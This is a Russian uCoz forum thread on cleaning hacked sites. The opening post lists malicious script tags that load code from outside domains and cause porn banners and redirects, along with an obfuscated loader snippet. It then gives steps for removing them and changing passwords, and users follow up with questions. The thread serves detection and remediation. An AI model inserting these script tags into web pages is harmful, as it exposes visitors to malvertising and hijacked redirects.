Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Если на вашем сайте появились порнобаннеры
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1 | 15:57:08
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов:

Код
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>
<script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Актуальные на данный момент и самые распространенные эти скрипты

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


Код
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script>


Код

<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>
<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>



Как удалить:

1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта.
Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта)

2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях
Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме
3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции:
1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль
2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу
3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально
5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль!
6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом
7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru
Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1


Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 406 | 10:20:24
raduga5370, видео рекламу можете отключить так. панель управления - настройка баннера и копирайта - не показывать видео рекламу - внизу сохранить. на счет всего остального обратитесь по адресу banner@ucoz.net с просьбой отключить рекламу для вашего социального проекта не забудьте указать адрес сайта

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
raduga5370
Сообщений: 2
Репутация: 0

Сообщение # 407 | 03:11:03
Спасибо, видео рекламу отключила. С просьбой обращались, они говорят рекламу отключили на год как образовательному учреждению, а она все равно есть.
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 408 | 08:06:33
Цитата raduga5370 ()
С просьбой обращались, они говорят рекламу отключили

raduga5370, обращение было в отношении сайта http://upramr.ucoz.ru/ для которого баннер отключен. На данное время для сайта amurskdetsad49.ucoz.ru баннер отключен на 1 месяц. Для полного отключения баннера на сайте amurskdetsad49.ucoz.ru вам необходимо заполнить бланк стандартной заявки, который был направлен вам ранее. Обратите внимание на то, что на бланке, в обязательном порядке, должна присутствовать подпись директора и печать учебного
заведения.

После заполнения бланка заявки, пожалуйста, отсканируйте его, и пришлите файл на e-mail banner@ucoz.net
Евгений5168
Сообщений: 1
Репутация: 0

Сообщение # 409 | 13:36:37
Здравствуйте!
как убрать всю рекламу на сайте образовательного учреждения?
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 410 | 16:00:12
SAHAR26
Сообщений: 1
Репутация: 0

Сообщение # 411 | 00:35:29
помогите с сайтом http://saharnica.ucoz.ru/ полно всяких банеров не "укозовских"
просматривал коды через панель управления/управление дизайном/редактирование шаблонов ничего не увидел :(
может нада как то по другому сайт смотреть и редактировать???
через хром и кнопочку ф12 вижу где скрипты лежат а через редактор найти не могу :(
вообщем хелп smile
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 412 | 00:41:02
SAHAR26, панель управления - дизайн - управление дизайном - глобальные блоки - первый контейнер - блок с меню сайта - ищите поиском браузера igrum
удаляйте скрипт

Код
<script async language="javascript" charset="UTF-8" type="text/javascript" src="http://igrumtu.ru/5xi5pyuji8i6pg79i4ql9193k3zv60lzs93risqkds2d8etn97x0s9p"></script>
после удаления смените все пароли. читать обязательно //forum.ucoz.ru/forum/45-52299-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
shveika
Сообщений: 21
Репутация: 6

Сообщение # 413 | 18:06:51
Ответа так и не дождалась, поэтому стёрла текст , поскольку удалить само сообщение у меня не получается...
Сообщение отредактировал shveika - Понедельник, 21 Дек 2015, 18:11:13
Nataly7339
Сообщений: 2
Репутация: 0

Сообщение # 414 | 16:12:30
Добрый день, на мобильных устройствах при входе на сайт и на все страницы без исключения выскакивают всплывающие окна, на обычном компе все нормально, проверяла в трех браузерах. В чем дело может быть? До этого обнаруживала посторонние коды в текстах-все удалила.
nf-triada
Сообщений: 35
Репутация: 5
Уровень замечаний:

Сообщение # 415 | 03:21:34
Цитата Nataly7339 ()
Добрый день, на мобильных устройствах при входе на сайт и на все страницы без исключения выскакивают всплывающие окна, на обычном компе все нормально, проверяла в трех браузерах. В чем дело может быть? До этого обнаруживала посторонние коды в текстах-все удалила.

Я вот тоже с таким столкнулся, поискал в коде но не нашел ничего необычного, поэтому решил что это реклама от хостинга ведет себя так на мобильных устройствах, да нагло, но в последнее время другого от укоза ждать не приходится, поэтому молчал и не стал ничего писать, т.к. нет смысла.
Но 2 недели назад мой сайт начал вылетать из поисковиков, потом его закрыли все браузеры, а вчера вообще заблокировал сам укоз, при этом я ПОПРЕЖНЕМУ не нахожу вредоносного кода на своем сайте, еще и техподдержка отвечает раз в день, печально все это(
Nataly7339
Сообщений: 2
Репутация: 0

Сообщение # 416 | 11:23:41
Цитата nf-triada ()
Я вот тоже с таким столкнулся, поискал в коде но не нашел ничего необычного, поэтому решил что это реклама от хостинга ведет себя так на мобильных устройствах, да нагло, но в последнее время другого от укоза ждать не приходится, поэтому молчал и не стал ничего писать, т.к. нет смысла.Но 2 недели назад мой сайт начал вылетать из поисковиков, потом его закрыли все браузеры, а вчера вообще заблокировал сам укоз, при этом я ПОПРЕЖНЕМУ не нахожу вредоносного кода на своем сайте, еще и техподдержка отвечает раз в день, печально все это(

ну вот, у меня были конечно тоже такие догадки, но не верилось в это...подождем что поддержка скажет -опровергнет или подтвердит
zarim
Сообщений: 489
Репутация: 82
Уровень замечаний:

Сообщение # 417 | 18:08:21
Если у вас тариф "бесплатный", то это новая мобильная реклама, увы
Onlinekanal
Сообщений: 51
Репутация: 0

Сообщение # 418 | 13:13:25
Доброго времени суток.
Есть переходы на адреса:
mailagent.xyz
addplugin2.com
klickander.com
videopotok.biz
traflablast.ru
infoclub.xyz
profitboosterapp.com
opendors.ru

В партнёрках такого шлака нет, в коде сайта тоже ничего не нашёл. Судя по найденому на просторах интернета - браузеры с вирусами. Как это побороть?
Сайт http://onlinekanal.ru/

Сообщение отредактировал Onlinekanal - Четверг, 18 Фев 2016, 13:32:24
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 419 | 23:01:30
Onlinekanal, у вас двойной боди клик на страницах. это о том как привлечь и спровоцировать срабатывание. а побороть такое никак

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Onlinekanal
Сообщений: 51
Репутация: 0

Сообщение # 420 | 12:18:41
Цитата webanet ()
у вас двойной боди клик на страницах

Кликандер... Одинарный только. Ну а сделать чёрный список сайтов, настроить чего-нибудь, чтобы блокировать адреса, браузеры подобные? Ну должна же быть защита от браузеров с подменками и переадресациями такими!!!

Такую вещь, как Content-Security-Policy на UCOZ настроить можно?

Сообщение отредактировал Onlinekanal - Пятница, 19 Фев 2016, 12:48:46
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Поиск: